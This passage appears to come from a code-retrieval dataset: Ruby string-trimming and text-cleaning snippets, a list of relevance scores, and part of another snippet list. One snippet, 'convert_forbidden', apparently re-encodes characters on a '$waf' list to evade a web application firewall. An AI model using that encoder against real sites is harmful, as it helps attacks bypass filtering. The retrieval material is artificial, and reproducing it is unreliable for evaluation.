"def truncate_message(message, length, ellipsis_string)\n chars = message.scan(/./mu)\n max_length_with_ellipsis = length - ellipsis_string.length - 1\n allowed_chars = chars[0..max_length_with_ellipsis]\n allowed_chars.join.gsub(/ ?\\.?,?$/, '') + ellipsis_string\n end",
"def illegal_words\n @words.select{ |word| word.length > @width }\n end",
"def correct_license_length\n key = Agent.config[:license_key]\n\n if key.length == 40\n true\n else\n ::NewRelic::Agent.logger.error(\"Invalid license key: #{key}\")\n false\n end\n end",
"def pre_process(text_line)\n processed_line = \"\"\n if text_line.slice(0..1)== \"LD\" && text_line.slice(14..20) == 'XXXXXXX'\n if @false_header_loaded\n processed_line = \"DT\" + text_line.slice(2..text_line.length())\n else\n processed_line = \"DH\" + text_line.slice(2..text_line.length())\n end\n elsif text_line.slice(0..1)== \"LD\"\n @false_header_loaded = true\n processed_line = text_line\n else\n processed_line = text_line\n end\n\n return processed_line\n\n end",
"def shortened_string(string)\n string[0, 100] << \"...\" unless string.length < 100\n end",
"def lstrip() end",
"def convert_forbidden(string)\n\n\tfinal_string = \"\"\n\tlen = string.length\n\n\tskip = false\n\tfor i in 0..string.length-1 do\n\t\t\tif !skip then\n\t\t\t\tif $waf.include? string[i] then\n\t\t\t\t\tres = uni(string[i] + string[i+1])\n\t\t\t\t\tfinal_string += res\n\t\t\t\t\tskip = true\n\t\t\t\telse\n\t\t\t\t\tfinal_string += URI.encode string[i]\n\t\t\t\tend\n\t\t\telse\n\t\t\t\tskip = false\n\t\t\tend\n\tend\n\n\treturn final_string.gsub(\"/\",\"%2F\").gsub(\"[\",\"%5B\").gsub(\"]\",\"%5D\").gsub(\"&\",\"%26\")\nend",
"def constrain_length(bob, minlen, maxlen)\n dir = bob.location - @anchor\n d = dir.mag\n # Is it too short?\n if d < minlen\n dir.normalize!\n dir *= minlen\n # Reset location and stop from moving (not realistic physics)\n bob.location = @anchor + dir\n bob.velocity *= 0\n elsif d > maxlen # is it too long?\n dir.normalize!\n dir *= maxlen\n # Reset location and stop from moving (not realistic physics)\n bob.location = @anchor + dir\n bob.velocity *= 0\n end\n end",
"def make_delay0(len)\n len > 0 ? make_delay(len) : false\n end",
"def compile_line(aRawLine)\n line_rep = aRawLine.map { |couple| compile_couple(couple) }\n \n # Apply the rule: when a line just consist of spaces \n # and a section element, then remove all the spaces from that line.\n line_to_squeeze = line_rep.all? do |item|\n if item.kind_of?(StaticText)\n item.source =~ /\\s+/\n else\n false\n end\n end\n line_rep_ending(line_rep) unless line_to_squeeze\n \n return line_rep\n end",
"def strip_stopwords!(stopwords, min_length)\n #noinspection RubyParenthesesAfterMethodCallInspection\n @body = @body.split.delete_if() do |x|\n t = x.downcase.gsub(/[^a-z]/, '')\n t.length < min_length || stopwords.include?(t)\n end.join(' ')\n end",
"def clip_grads(grads, max_norm)\n total_norm = grads.reduce(0) do |total, grad|\n total + (grad**2).sum\n end\n\n total_norm = Numo::SFloat::Math.sqrt(total_norm)\n\n rate = max_norm / (total_norm + 1e-6)\n\n grads.each { |grad| grad.inplace * rate } if rate < 1\nend",
"def ignorable_nl!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 106 )\n\n \n # - - - - main rule block - - - -\n # at line 948:3: ( '//' (~ ( '\\\\n' | '\\\\r' ) )* ( ( '\\\\r' )? '\\\\n' )? | '/*' ( . )* '*/' | ( '\\\\t' | '\\\\f' | ' ' | '\\\\u00A0' | '\\\\n' | '\\\\r' )+ )\n alt_50 = 3\n look_50_0 = @input.peek( 1 )\n\n if ( look_50_0 == 0x2f )\n look_50_1 = @input.peek( 2 )\n\n if ( look_50_1 == 0x2f )\n alt_50 = 1\n elsif ( look_50_1 == 0x2a )\n alt_50 = 2\n else\n raise NoViableAlternative( \"\", 50, 1 )\n end\n elsif ( look_50_0.between?( 0x9, 0xa ) || look_50_0.between?( 0xc, 0xd ) || look_50_0 == 0x20 || look_50_0 == 0xa0 )\n alt_50 = 3\n else\n raise NoViableAlternative( \"\", 50, 0 )\n end\n case alt_50\n when 1\n # at line 948:5: '//' (~ ( '\\\\n' | '\\\\r' ) )* ( ( '\\\\r' )? '\\\\n' )?\n match( \"//\" )\n # at line 948:10: (~ ( '\\\\n' | '\\\\r' ) )*\n while true # decision 45\n alt_45 = 2\n look_45_0 = @input.peek( 1 )\n\n if ( look_45_0.between?( 0x0, 0x9 ) || look_45_0.between?( 0xb, 0xc ) || look_45_0.between?( 0xe, 0xffff ) )\n alt_45 = 1\n\n end\n case alt_45\n when 1\n # at line 948:10: ~ ( '\\\\n' | '\\\\r' )\n if @input.peek( 1 ).between?( 0x0, 0x9 ) || @input.peek( 1 ).between?( 0xb, 0xc ) || @input.peek( 1 ).between?( 0xe, 0xff )\n @input.consume\n else\n mse = MismatchedSet( nil )\n recover mse\n raise mse\n end\n\n\n\n else\n break # out of loop for decision 45\n end\n end # loop for decision 45\n # at line 948:28: ( ( '\\\\r' )? '\\\\n' )?\n alt_47 = 2\n look_47_0 = @input.peek( 1 )\n\n if ( look_47_0 == 0xa || look_47_0 == 0xd )\n alt_47 = 1\n end\n case alt_47\n when 1\n # at line 948:30: ( '\\\\r' )? '\\\\n'\n # at line 948:30: ( '\\\\r' )?\n alt_46 = 2\n look_46_0 = @input.peek( 1 )\n\n if ( look_46_0 == 0xd )\n alt_46 = 1\n end\n case alt_46\n when 1\n # at line 948:30: '\\\\r'\n match( 0xd )\n\n end\n match( 0xa )\n\n end\n\n when 2\n # at line 949:5: '/*' ( . )* '*/'\n match( \"/*\" )\n # at line 949:10: ( . )*\n while true # decision 48\n alt_48 = 2\n look_48_0 = @input.peek( 1 )\n\n if ( look_48_0 == 0x2a )\n look_48_1 = @input.peek( 2 )\n\n if ( look_48_1 == 0x2f )\n alt_48 = 2\n elsif ( look_48_1.between?( 0x0, 0x2e ) || look_48_1.between?( 0x30, 0xffff ) )\n alt_48 = 1\n\n end\n elsif ( look_48_0.between?( 0x0, 0x29 ) || look_48_0.between?( 0x2b, 0xffff ) )\n alt_48 = 1\n\n end\n case alt_48\n when 1\n # at line 949:10: .\n match_any\n\n else\n break # out of loop for decision 48\n end\n end # loop for decision 48\n match( \"*/\" )\n\n when 3\n # at line 950:5: ( '\\\\t' | '\\\\f' | ' ' | '\\\\u00A0' | '\\\\n' | '\\\\r' )+\n # at file 950:5: ( '\\\\t' | '\\\\f' | ' ' | '\\\\u00A0' | '\\\\n' | '\\\\r' )+\n match_count_49 = 0\n while true\n alt_49 = 2\n look_49_0 = @input.peek( 1 )\n\n if ( look_49_0.between?( 0x9, 0xa ) || look_49_0.between?( 0xc, 0xd ) || look_49_0 == 0x20 || look_49_0 == 0xa0 )\n alt_49 = 1\n\n end\n case alt_49\n when 1\n # at line \n if @input.peek( 1 ).between?( 0x9, 0xa ) || @input.peek( 1 ).between?( 0xc, 0xd ) || @input.peek(1) == 0x20 || @input.peek(1) == 0xa0\n @input.consume\n else\n mse = MismatchedSet( nil )\n recover mse\n raise mse\n end\n\n\n\n else\n match_count_49 > 0 and break\n eee = EarlyExit(49)\n\n\n raise eee\n end\n match_count_49 += 1\n end\n\n\n end\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 106 )\n\n end",
"def fix_lone_percent_signs(string_to_fix)\n if LONE_PERCENT_SIGN =~ string_to_fix.to_s\n string_to_fix.gsub!(LONE_PERCENT_SIGN, \"%25\")\n end\n end",
"def smart_truncate(len = 30, ending = '...')\n len = Math.max(len, 5)\n return self if self.length <= len\n s = self[0...(len-2)].reverse\n bits = s.split(/[\\s\\-,]/,2)\n s = bits.length == 2 ? bits[1] : bits[0]\n s.reverse + ending\n end",
"def extract_reject_long_strings(path)\n\t\tdata_array = []\n\t\thtml = File.read(path)\n\t\tdoc = Nokogiri::HTML(html)\n\t\telems = doc.search \"[text()*='ISBN']\"\n\t\tif !elems.first.nil?\n\t\t\tif elems.first.to_s.length < 220\n\t\t\t\telem = elems.first.parent\n\t\t\telse\n\t\t\t\telem = elems.last.parent\n\t\t\tend\n\t\telse\n\t\t\telem = ''\n\t\tend\n\t\told_elem = elem\n\t\tfoward = true\n\n\t\twhile elem.to_s != ''\n\t\t\tparsed_elem = Nokogiri::HTML(elem.to_s)\n\t\t\tresult_elem = (parsed_elem.xpath(\"//text()\").to_s).gsub(\"\\n\", \" \").to_s.gsub(/ +/, \" \").force_encoding(\"utf-8\")\n\t\t\tif result_elem.length < 220\n\t\t\t\tdata_array.push(result_elem)\n\t\t\tend\n\t\t\tif foward\n\t\t\t\tif elem.next_element.to_s != ''\n\t\t\t\t\telem = elem.next_element\n\t\t\t\telse\n\t\t\t\t\telem = old_elem.previous_element\n\t\t\t\t\tfoward = false\n\t\t\t\tend\n\t\t\telse\n\t\t\t\tif elem.previous_element.to_s != ''\n\t\t\t\t\telem = elem.previous_element\n\t\t\t\telse\n\t\t\t\t\telem = ''\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\tdata_array\n\tend",
"def adj_read_bases\n # mapping quality after '^' symbol is substituted\n # to avoid splitting at non indel + or - characters\n # read ends marking by '$' symbol is substituted\n # insertion and deletion marking by '*' symbol is substituted\n self.read_bases.gsub!(/\\^./, '')\n self.read_bases.delete! '$'\n self.read_bases.delete! '*'\n # warn about reads with ambiguous codes\n # if self.read_bases.match(/[^atgcATGC,\\.\\+\\-0-9]/)\n # warn \"Ambiguous nucleotide\\t#{self.read_bases}\"\n # end\n end",
"def filter new_text\n allowed_length = [LENGTH_LIMIT - text.length, 0].max\n new_text[0, allowed_length]\n end",
"def shortened_tweet_truncator(tweet)\n selective_tweet_shortener(tweet)\n if tweet.length >= 140\n tweet[0...137].concat(\"...\") #(...) is 3 characters!\n else\n tweet if tweet.length < 140\n end\nend",
"def normalize_string_reason(reason)\n reason.scan(/(x[1-4])/)\n end",
"def clean_numbers(original)\n number = original.delete(\"()-. \")\n\n if number.length == 10\n\n elsif number.length == 11\n if number.start_with?(\"1\")\n number = number[1..-1]\n else\n number = INVALID_PHONE\n end\n\n else\n number = INVALID_PHONE\n end\n return number\n end",
"def link_check\n check = false\n if self.message.include? \"http://\"\n check = true\n elsif self.message.include? \"https://\"\n check = true\n else\n check = false\n end\n\n if check == true\n arr = self.message.split\n index = arr.map{ |x| x.include? \"http\"}.index(true)\n self.link = arr[index]\n if arr[index].length > 23\n arr[index] = \"#{arr[index][0..20]}...\"\n end\n\n self.message = arr.join(\" \")\n end\n end",
"def extra_clean_str(str)\n str = str.downcase.gsub @extra_ua_filter, ''\n str = str.gsub(/[^\\x20-\\x7F]/, '')\n str.strip\n end",
"def shorter\n shorten(6)\n end",
"def cutoff(str, limit = 100)\n if str.length > limit\n str[0, limit] + '...'\n else\n str\n end\n end",
"def normalise_alt_spelling(header_name)\n # Run alt spelling regex against header\n spell_match = self.class.alt_spelling_header_regex.match header_name\n if spell_match\n # Set header name as AltSpelling# where # is num\n norm_header_name = 'altspelling' + spell_match[1]\n return norm_header_name\n end\n nil\n end",
"def find_shortest_failure(str, &block)\n unless call_fails(str, &block)\n raise \"hey, the input didn't fail!\"\n else\n # Chop off stuff from the beginning and then the end\n # until it stops failing\n bad = str\n 0.upto(bad.length) {|index|\n bad.length.downto(1) {|length|\n begin\n loop {\n s = bad.dup\n s[index,length] = ''\n break if bad == s\n break unless call_fails(s, &block)\n bad = s\n }\n rescue IndexError\n break\n end\n }\n }\n raise \"shortest failure is #{bad.inspect}\"\n end\n end",
"def selective_tweet_shortener(string)\n if string.length < 140 \n string\n else \n word_substituter(string)\n end\nend"
] |
[
"0.48733142",
"0.47056305",
"0.47010913",
"0.47010913",
"0.46958846",
"0.46873704",
"0.4680276",
"0.45950803",
"0.45738348",
"0.45472252",
"0.45407587",
"0.4518334",
"0.4510734",
"0.44531837",
"0.44484276",
"0.44479308",
"0.44177917",
"0.43902066",
"0.43876725",
"0.43861017",
"0.43770093",
"0.43733704",
"0.43684667",
"0.43677786",
"0.43622822",
"0.4358423",
"0.43522587",
"0.43481418",
"0.4343708",
"0.43425342",
"0.4332642",
"0.43299788",
"0.4320891",
"0.4320043",
"0.4318949",
"0.42955625",
"0.42883274",
"0.42878988",
"0.42878988",
"0.4273129",
"0.42711413",
"0.42606264",
"0.42467183",
"0.42405686",
"0.42324325",
"0.42305264",
"0.42292213",
"0.4224277",
"0.4218821",
"0.4215398",
"0.42148706",
"0.4213198",
"0.4212404",
"0.42122552",
"0.4209172",
"0.42044073",
"0.42033714",
"0.41992903",
"0.41981542",
"0.41968367",
"0.41944757",
"0.41829324",
"0.41746694",
"0.4168564",
"0.41628957",
"0.41591048",
"0.41573793",
"0.4156311",
"0.4148923",
"0.41435063",
"0.41410366",
"0.4137648",
"0.41355795",
"0.41341525",
"0.41312942",
"0.41263855",
"0.41230232",
"0.412051",
"0.41186845",
"0.41156295",
"0.41121903",
"0.41109002",
"0.41072685",
"0.41064242",
"0.41004437",
"0.40885416",
"0.40871128",
"0.40853068",
"0.4084806",
"0.40837336",
"0.4082013",
"0.40813568",
"0.40813106",
"0.40769586",
"0.4076219",
"0.40735376",
"0.40712357",
"0.4067989",
"0.40598845",
"0.40592673"
] |
0.66380143
|
0
|
Trims the first nucleotide from the 5' end of each read. Returns nothing.
|
def trim
return if skip_step?(@names.get('trim'), 'trimming')
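# fastx_trimmer's -f flag sets the first base to keep, so -f 2 drops the
# single 5'-most nucleotide of every read; -Q33 sets the quality score
# ASCII offset to 33 (Sanger/Illumina 1.8+ encoding).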
run_cmd(\
'fastx_trimmer -Q33 -f 2' \
" -i #{@names.get('clip')}" \
" -o #{@names.get('trim')}"
)
end
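# Illustrative call (hypothetical): trim takes no arguments and is meant to
# run after clip, since it reads @names.get('clip') and writes
# @names.get('trim'):
#   trim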
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def trim(n)\r\n @text = @text[n..-1] || \"\"\r\n end",
"def trim\n repeat_until_unchanged(&:trim_once)\n end",
"def _strip seq\n seq.shift while (tok = seq.first) && tok.type == :endline\n end",
"def rstrip!() end",
"def drop_from_each_line(n)\n self.lines.map do |line|\n k = 0\n line.chars.drop_while do |x|\n k += 1\n k <= n && x != \"\\n\"\n end.join(\"\")\n end.join(\"\")\n end",
"def strip!() end",
"def rstrip() end",
"def adj_read_bases\n # mapping quality after '^' symbol is substituted\n # to avoid splitting at non indel + or - characters\n # read ends marking by '$' symbol is substituted\n # insertion and deletion marking by '*' symbol is substituted\n self.read_bases.gsub!(/\\^./, '')\n self.read_bases.delete! '$'\n self.read_bases.delete! '*'\n # warn about reads with ambiguous codes\n # if self.read_bases.match(/[^atgcATGC,\\.\\+\\-0-9]/)\n # warn \"Ambiguous nucleotide\\t#{self.read_bases}\"\n # end\n end",
"def auto_trim!; end",
"def trim(n)\n result = self\n while n > 0 && !result.empty?\n result = result.tail\n n -= 1\n end\n result\n end",
"def strip() end",
"def trim(start_nt, end_nt, ref_option = :HXB2, path_to_muscle = false)\n seq_hash = self.dna_hash.dup\n seq_hash_unique = seq_hash.uniq_hash\n trimmed_seq_hash = {}\n seq_hash_unique.each do |seq, names|\n trimmed_seq = ViralSeq::Sequence.new('', seq).sequence_clip(start_nt, end_nt, ref_option, path_to_muscle).dna\n names.each do |name|\n trimmed_seq_hash[name] = trimmed_seq\n end\n end\n return_seq_hash = self.dup\n return_seq_hash.dna_hash = trimmed_seq_hash\n return return_seq_hash\n end",
"def five_prime_utr_seq\n return self.seq[0, self.coding_region_cdna_start - 1]\n end",
"def strip_text_unique(passage)\n strip_text(passage).uniq#unique\nend",
"def skip\n @str.slice! @last_re if peek_next_type != :eos\n end",
"def no_auto_trim!; end",
"def sample_and_remove(n)\n samples = sample(n)\n @content -= samples\n samples\n end",
"def strip_excess_words(content_player_id)\n\t\tself.played_words.each do |value|\n\t\t\tif value.t != self.t - 1 \n\t\t\t\tvalue.t_l.clear \n\t\t\tend\n\t\tend\t\n\tend",
"def remove_non_amino_acids(sequence)\n sequence.gsub(Nonstandard_AA_re, '')\n end",
"def spin_words (words)\n word = words.split(\" \")\n word.each do |item|\n if item.length >= 5\n item.reverse!\n end\n end\n return word.join(\" \")\nend",
"def digester(string, missed_cleavages) # Returns an array of chomped sequences\n\tstring.upcase!\n\tarr = (0..(string.upcase.length-1)).map {|i| string[i]}\n\tmisses = 0; splits = []\n\t(0..missed_cleavages).each do |miss_cleav|\n\t\t(0..missed_cleavages).each do |init_num|\n\t\t\tlast, curr, next_item = nil, nil, nil; keeper = \"\"\n\t\t\tmisses = init_num\n\t\t\tarr.each_index do |i|\n\t\t\t\tlast = arr[i-1]; curr = arr[i]; next_item = arr[i+1]\n\t\t#\tputs \"last, curr, next: #{last}, #{curr}, #{next_item}\"\n\t\t\t\tkeeper << curr if curr\n\t\t#\tputs \"keeper: #{keeper}\"\n\t\t\t\tif curr == 'R' or curr == 'K'\n\t\t\t\t\tunless next_item == \"P\"\n\t\t#\t\t\t\tputs \"misses:missed cleavages\t\t\t#{misses}:#{miss_cleav}\"\n\t\t\t\t\t\tif misses < miss_cleav\n\t\t\t\t\t\t\tmisses += 1\n\t\t\t\t\t\telse\n\t\t\t\t\t\t\tsplits << keeper\n\t\t\t\t\t\t\tkeeper = \"\";\tmisses = 0\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\t\tsplits << keeper if next_item == nil\n\t\t#\t\tputs \"Splits looks like: #{splits}\"\n\t\t\tend\n\t\tend\t\t\t\n\tend\n\tsplits.uniq\nend",
"def validate_nucleuotides!(dna)\n invalid = dna.chars.uniq - VALID_NUCLEOTIDE\n raise ArgumentError unless invalid.empty?\n end",
"def delete_ending(word)\n word_size = word.size\n if word_size <= 3\n return word\n else\n 3.downto(1).each do |i|\n ending = word.last(i)\n if @rus_endings.include?(ending)\n return word[0, word_size - i]\n end\n end\n end\n\n word\n end",
"def lstrip!() end",
"def stripInterchange(interchangeName)\n interchangeName[11..-5]\nend",
"def read_auto_clean_up; end",
"def trimmed_names \n trimmed_names = []\n raw_names.each do |name|\n article_trim_strings.each do |trim| #Remove all trim words from name\n name = !name.index(trim).nil? ? name.sub(trim, \"\") : name\n end\n name = name.strip\n if(name.length > 5)\n\ttrimmed_names << name #Add trimmed name to the list\n end\n end\n trimmed_names\n end",
"def doing_raw_file_to_verified_unique_researches # adjustable line length filter\n consumer = Fiber.new do |producer, queue|\n a = File.read(\"../../Documents/20111224-research.txt\")\n\t new = a.to_textual\n#TODO finishe\t \n @megadata = a.sort do |x,y|\n x.downcase <=> y.downcase\n end\n @megadata_unique = @megadata.uniq\n f = open(\"./tmp/database_doings/doing_uniques/uniques_done.txt\", \"a\") do |f| \n loop do\n queue = producer.transfer(consumer, queue)\n puts f << queue\n queue.clear\n end\n raise StopIteration\n end\n end\n producer = Fiber.new do |consumer, queue|\n #IO.foreach(\"./tmp/database_doings/doing_uniques/uniques_todo.txt\") do |line|\n queue = \"\"\n puts queue\n @megadata_unique.each do |line|\n sequence_text = line.to_textual.de_comma\n if sequence_text.length < 50 # adjustable\n puts \"line ignored due to length\"\n elsif Sequence.find_by_sequence_text(sequence_text)\n puts \"line ignored as it is already in database : \" + \"#{sequence_text}\"\n else\n sequence_creation = sequence_text.de_space unless nil\n sequence_complete = sequence_text.split(//).sort.join('').strip unless nil\n sequence_lexigram = lexigram_sequencer(sequence_text) unless nil\n sequence_singular = sequence_complete.squeeze unless nil\n description = \"research\"\n reference = \"literoti\"\n anagram = 0\n name = 0\n phrase = 0\n research = 1\n external = 0\n internal = 0\n created_at = \"2011-12-21 12:12:00\"\n #line = \"#{sequence_text}\\n\"\n line = \"#{sequence_text}\\t#{sequence_creation}\\t#{sequence_complete}\\t#{sequence_lexigram}\\t#{sequence_singular}\\t#{description}\\t#{reference}\\t#{anagram}\\t#{name}\\t#{phrase}\\t#{research}\\t#{external}\\t#{internal}\\t#{created_at}\\n\"\n queue << line\n break unless line\n consumer.transfer queue\n queue.clear\n end\n end\n end\n raise StopIteration\n end",
"def cutinfo(string)\n inf=/\\024/=~string1\n inf=inf+2\n trans=string1[inf..-1]\nend",
"def remove(s)\np x = s.split(\"\")\nif x.last === \"!\"\nz = x.pop\np x.join(\"\")\nelsif x.last != \"!\"\np x.join(\"\")\nend\nend",
"def remove_duplicates_recursivly (phrase, important, string)\n\ttype = [\"\"]\n\tremovables = [\"CC\", \",\"]\n\tphrase.each do |sub|\n\t\tif sub.exact_tag?(type)\n\t\t\t# it is a repetition\n\t\t\tif delete.empty?\n\t\t\t# If it is the first repetition, check the first\n\t\t\t# done to avoid checking every entity if in important\n\t\t\t\tdelete[!arr_in_phrase(important, sub.to_s)]\n\t\t\tend\n\t\t\t# save it\n\t\t\tsame << sub.to_s\n\t\t\tdelete << !arr_in_phrase(important, sub.to_s)\n\n\t\telsif sub.exact_tag?(removables)\n\t\t\t# it is not a repetition, but it is a connector of some sort (\",\" \"or\" \"and\" maybe something else?)\n\t\t\tto_remove = sub.to_s\n\t\telsif !sub.exact_tag?(removables)\n\t\t\t# not a repetition\n\t\t\tif !same.empty? && delete.any?{|boolean|boolean}\n\t\t\t\t# delete unnecessary information\n\t\t\t\t# need to implement: sub! every true and its left removable (from to_remove) and spaces by a space\n\t\t\t\t# if there is only one true, delete all removables\n\t\t\t\t# elsif the last one is false put its left removable (from to_remove)\n\t\t\t\t# before the last undeleted string, and delete the other removable so there wont be 2 of them. (example: one, two and three -> delete three -> one and two)\n\t\t\tend\n\t\t\tsame = [sub.to_s]\n\t\t\tdelete = []\n\t\t\tif sub.has? :tag\n\t\t\t\ttype = sub.tag\n\t\t\tend\n\t\tend\n\t\tstring = remove_duplicates_recursivly(sub, important, string)\n\tend\nend",
"def read_content(content)\n unless content.empty?\n content.gsub(/-{3}.*-{3}\\n/m, '')\n end\n end",
"def auto_trim?; end",
"def remove(n = 1)\n left(n)\n @text.slice!(@cursor, n)\n end",
"def trim_requested; end",
"def get_sandwich(string) # return whatever is between the bread\n return \"\" if string.scan(/bread/).length != 2\n new_str = \"\"\n (string.size-4).times do |i|\n if string[i..i+4] == 'bread'\n val = i+5\n until string[val..val+4] == 'bread'\n new_str += string[val]\n val += 1\n end\n break\n end\n end\n return new_str\nend",
"def trim_stream\n trimmed = @stream.lstrip\n\n return if trimmed.nil?\n\n @stream_char += (@stream.length - trimmed.length)\n @stream = trimmed\n end",
"def check_csfasta(fasta)\n # length is the total read lengh + 2\n # cat *.csfasta | perl -ne 'next if /^#/;$i++;if ($i%2==0) {print unless \n # length($_)==52} else {print unless /^>\\d+_\\d+\\_\\d+\\_(F|R)(3|5)(-P2)*\\n$/}'\n # | more\n length = get_bp_length(fasta) + 2\n i = 0\n output = \"\"\n File.open(fasta).each do |l|\n next if /^#/.match(l)\n i = i + 1\n if ( i % 2 == 0 ) && ( l.size != length ) &&\n !/^>\\\\d+_\\\\d+_\\\\d+_(F|R)(3|5)(-P2)*\\n$/.match(l)\n output = output + l\n end\n end\n output\n end",
"def remove_reluctant(strio)\r\n return if strio.eof?\r\n if (ch=strio.getc) == ??\r\n #Do nothing\r\n else\r\n strio.ungetc(ch)\r\n end\r\nend",
"def pirates_say_arrrrrrrrr(string)\n\tarray_1 = string.downcase.split\"\"\n\tarray_2 = []\n\nloop do \n\tarrr = array_1.index(\"r\")\n\tbreak if arrr == nil\n\tarray_1.delete_at(arrr)\n\tarray_2 << array_1[arrr]\n\t\nend\n\narray_2.join\n\nend",
"def complement(nucleotide)\n case nucleotide\n when \"A\"\n \"T\"\n when \"T\"\n \"A\"\n when \"G\"\n \"C\"\n when \"C\"\n \"G\"\n end\nend",
"def read_wide\r\n self[/^.*?(?=\\x00{2})/].delete(0.chr)\r\n end",
"def cleanup_noreg(string)\n blocks = string.split\n result = blocks.map do |word|\n word = word.chars.map! do |char|\n if char.downcase == char.downcase.upcase\n ' '\n else \n char\n end\n end\n word = word.join\n # p word\n #p word.squeeze(\" \")\n #word.squeeze(\" \")\n # take note that here +*& is a block or word, and gets replaced by a space without\n # any contiguous letter chars\n # so after join on line 48, there are 3 spaces between my and line, without the squeeze call\n word\n end\n result = result.join(' ').squeeze(' ')#.squeeze\nend",
"def doing_verified_unique_researches # adjustable line length filter\n consumer = Fiber.new do |producer, queue|\n a = File.readlines(\"./tmp/insert_researches.txt\")\n @megadata = a.sort do |x,y|\n x.downcase <=> y.downcase\n end\n @megadata_unique = @megadata.uniq\n f = open(\"./tmp/database_doings/doing_uniques/uniques_done.txt\", \"a\") do |f| \n loop do\n queue = producer.transfer(consumer, queue)\n puts f << queue\n queue.clear\n end\n raise StopIteration\n end\n end\n producer = Fiber.new do |consumer, queue|\n #IO.foreach(\"./tmp/database_doings/doing_uniques/uniques_todo.txt\") do |line|\n queue = \"\"\n puts queue\n @megadata_unique.each do |line|\n sequence_text = line.to_textual.de_comma\n if sequence_text.length < 52 # adjustable\n puts \"line ignored due to length\"\n elsif Sequence.find_by_sequence_text(sequence_text)\n puts \"line ignored as it is already in database : \" + \"#{sequence_text}\"\n else\n sequence_creation = sequence_text.de_space unless nil\n sequence_complete = sequence_text.split(//).sort.join('').strip unless nil\n sequence_lexigram = lexigram_sequencer(sequence_text) unless nil\n sequence_singular = sequence_complete.squeeze unless nil\n description = \"research\"\n reference = \"literoti\"\n anagram = 0\n name = 0\n phrase = 0\n research = 1\n external = 0\n internal = 0\n created_at = \"2011-12-21 12:12:00\"\n #line = \"#{sequence_text}\\n\"\n line = \"#{sequence_text}\\t#{sequence_creation}\\t#{sequence_complete}\\t#{sequence_lexigram}\\t#{sequence_singular}\\t#{description}\\t#{reference}\\t#{anagram}\\t#{name}\\t#{phrase}\\t#{research}\\t#{external}\\t#{internal}\\t#{created_at}\\n\"\n queue << line\n break unless line\n consumer.transfer queue\n queue.clear\n end\n end\n end\n raise StopIteration\n end",
"def spinWordsAlt( string )\n #Split words in the string into an array\n words = string.split(' ')\n for i in ( 0...words.length() ) do\n if words[i].length() >= 5\n words[i] = reverse( words[i] )\n end\n end\n return words.join(' ')\nend",
"def skip n=1\r\n\t\tif !@buffer then return nil end\r\n\t\t@buffer= @buffer[n..-1]\r\n\t\tif !@buffer then nl end\r\n\t\tif !@buffer then return nil end\r\n\t\t@buffer.lstrip!\r\n\t\t@col=@max-@buffer.length+1\r\n\t\tif (@buffer.lstrip==\"/n\" || @buffer.lstrip==\"\") then nl end\r\n end",
"def prune_string(string)\n string.chomp.slice(0..pruned_width)\n end",
"def solo5(arr)\n\tarr.delete_if {|sup| sup.include?(\" \")} \n\t#p zombie_apocalypse_supplies\nend",
"def getsandwich(str)\n bread = false\n inbetween= \"\"\n breadcount = 0\n (str.size-4).times do |n|\n if str[n..n+4] == 'bread'\n breadcount += 1\n end\n end\n if breadcount != 2\n return \"\"\n end\n str.size.times do |b|\n slice = str[b..b+4]\n if slice == \"bread\"\n bread = !bread\n end\n if bread == true\n inbetween += str[b]\n end\n end\n return inbetween[5...inbetween.size]\nend",
"def clean_digit_lines(separated_digit_lines)\n separated_digit_lines.each do |chunk|\n chunk.delete_at(3)\n if chunk[0].length == 0\n chunk[0] = \" \"\n end\n end\nend",
"def get_sandwich(str) # needs some work\n (str.size - 4).times do |i|\n slice = str[i..(i + 4)]\n if slice != \"bread\"\n puts slice\n end\n end\n\nend",
"def spinWords(string)\r\n \r\n var= string.split(' ') #[\"Hey\", \"fellow\", \"warriors\"]\r\n finalarry=[]\r\n var.each do |x|\r\n arry= x.split('') \r\n if arry.count >= 5\r\n finalarry << arry.reverse\r\n else\r\n finalarry<< arry\r\n end\r\n\r\n \r\n end\r\n \r\n lastarry=[]\r\n finalarry.each do |y|\r\n lastarry << y.join(\"\")\r\n \r\n end\r\n \r\n result= lastarry\r\n p result.join(' ')\r\n\r\n\r\n \r\n \r\nend",
"def trim_id3v1_string(str)\n str.tr(\"\\x00\".b, '').strip\n end",
"def idle_trim?; end",
"def wash_row(s)\n i = s.index(')')\n raise \"line in file phrases.ini does not contain )\" if i == nil\n return s.slice(i+1..-1).strip.upcase\n # slice vraci oznaceny substring\n # slice! vraci zbytek stringu\nend",
"def crunch(string)\n non_consecutive = ''\n\n string.chars.each do |char|\n non_consecutive << char if char != non_consecutive[-1]\n end\n\n non_consecutive\nend",
"def lstrip() end",
"def read_input_ignore_empty\n attempts = 0\n input = \"\"\n begin\n attempts = attempts + 1\n input = read_input\n end while input == \"\" && attempts < 5\n return input\n end",
"def non_repeating3(str)\n set = Set.new\n str.each_char do |char|\n return char unless set.add?(char)\n end\nend",
"def spin(string)\n spin = string.split(' ').map { |s| s.length >= 5 ? s.reverse : s }\n spin.join(' ')\nend",
"def custom_squeeze(string)\n # characters = []\n # p characters = sentence.chars\n characters = string.chars\n eos = characters.length - 1\n return_string = \"\"\n # p return_string << characters[2]\n\n characters.each_with_index do |char, index|\n unless char == characters [index + 1] then return_string << characters[index]\n # puts \"char = #{char}\"\n # puts \"index = #{index}\"\n # puts \"characters from index = #{characters [index + 1]}\"\n # puts \"eos = #{eos}\"\n # puts \"return_string = #{return_string << characters[index]}\"\n # puts\n # else\n # puts \"Found repeating char #{char} at index #{index + 1}! \\n Removing repeating character!\"\n # puts\n end\n end\n return return_string\nend",
"def remove_duplicates(str)\n uniques = \"\"\n\n str.each_with_index do |ltr, i|\n uniques << ltr unless str[0..i - 1].include?(ltr)\n end\n\n uniques\nend",
"def spinWords(string)\n array_of_words = string.split(\" \")\n array_of_words.each do |word|\n if word.length >= 5\n word.reverse!\n end\n end\n return array_of_words.join(\" \")\nend",
"def rstrip!\n erase! @result.length - 1 - (@result.rindex(/[^\\s]/) || -1)\n end",
